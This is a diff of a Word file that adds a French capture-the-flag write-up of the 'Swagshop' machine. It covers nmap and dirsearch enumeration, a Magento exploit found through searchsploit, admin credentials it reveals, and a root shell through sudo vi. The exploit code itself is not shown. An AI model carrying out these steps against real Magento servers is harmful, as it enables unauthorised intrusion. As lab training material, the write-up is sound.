--- a/[easy] Swagshop.docx
+++ b/[easy] Swagshop.docx
@@ -1,18 +1,10 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
   <w:body>
     <w:p>
       <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>info</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>]</w:t>
+        <w:t>[info]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -86,8 +78,6 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -140,12 +130,135 @@
         <w:lastRenderedPageBreak/>
         <w:t>Enumération</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
-      </w:r>
-    </w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> initiale</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Comme toujours, nous utilisons nmap pour énumérer les ports et services de la machine distante : </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9212"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9212" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>$ nmap -T4 -A 10.10.10.</w:t>
+            </w:r>
+            <w:r>
+              <w:t>140</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[nmap]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Deux ports sont ouverts, le port 22 pour un serveur </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> et le port 80 pour </w:t>
+      </w:r>
+      <w:r>
+        <w:t>un serveur web.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Nous allons énumérer ce dernier afin de trouver soit des répertoires soit des fichiers intéressants avec dirsearch :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9212"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9212" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">$ dirsearch -w wordlist.txt -f -e </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>php,txt,html</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>" -x 403</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -r</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:t>dirsearch</w:t>
+      </w:r>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>En allant sur le site web, nous nous rendons compte qu’il y a une API Magento qui tourne.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -174,12 +287,158 @@
           <w:sz w:val="36"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Exploitation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
+        <w:t>Obtenir un accès utilisateur</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Une recherche sur searchsploit est </w:t>
+      </w:r>
+      <w:r>
+        <w:t>intéressante</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> car elle nous </w:t>
+      </w:r>
+      <w:r>
+        <w:t>révèlera</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> plusieurs exploits disponibles :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9212"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9212" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>$ searchsploit Magento</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[searchsploit]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">On récupère l’exploit </w:t>
+      </w:r>
+      <w:r>
+        <w:t>37977 :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9212"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9212" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">$ </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>locate</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 37977.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">$ </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>cp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> chemin ./37977</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>locatecp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Après avoir passé beaucoup de temps sur l’exploit à le </w:t>
+      </w:r>
+      <w:r>
+        <w:t>réécrire</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, il finit par fonctionner :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[exploit]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">L’exploit nous indique une page html avec un identifiant et un mot de passe : </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>forme:forme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> pour nous connecter sur l’API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> en tant qu’Administrateur</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Nous explorons donc l’interface et il y a une section </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -211,14 +470,128 @@
           <w:sz w:val="36"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Elévation de privilège</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
-      </w:r>
-    </w:p>
+        <w:t>Obtenir un accès Administrateur</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">En faisant l’énumération de base, on se rend compte que nous pouvons exécuter l’éditeur de texte VI avec les droits </w:t>
+      </w:r>
+      <w:r>
+        <w:t>d’administrateur</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9212"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9212" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">$ </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -l</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Nous allons donc sur le site </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GTFOBin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, pour voir les manipulations à effectuer pour obtenir un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> administrateur</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> et lire le flag root.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>https://gtfobins.github.io/gtfobins/vi/</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9212"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9212" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>$</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[vi]</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -231,8 +604,8 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
-  <w:abstractNum w:abstractNumId="0">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3D760EA0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="971EC05E"/>
@@ -351,7 +724,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -367,144 +740,383 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
